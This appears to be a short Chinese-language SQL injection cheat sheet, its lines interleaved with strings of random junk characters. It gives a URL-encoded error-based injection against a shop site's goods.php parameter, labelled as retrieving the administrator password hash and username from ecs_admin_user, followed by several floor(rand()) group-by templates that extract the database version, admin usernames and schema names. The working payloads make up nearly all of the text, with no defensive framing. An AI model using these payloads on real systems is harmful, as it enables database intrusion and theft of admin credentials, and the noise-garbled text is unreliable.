7 ?9 T, |3 z# d! x* D. _# ^1 M
9 B3 h% U6 l. V' C) ~
获得 admin passwd(md5) * [' ~; E# ~. a) |9 T! L# J# f" r4 |% y8 y
4 {8 \% `3 Z9 K% p http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ E+ Y7 M2 {% c
* d8 H, B _4 m报错注射 , m! W! ^9 r% X, L8 |- M5 NSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) 1 \- R5 j6 x2 z- Z: o7 p( ^. W$ k+ }5 b% ~3 B3 `: g8 k3 H: a
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)- s; h$ n( t/ x% F" [7 H: F
0 j5 z. |$ c! P- F, U* z
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)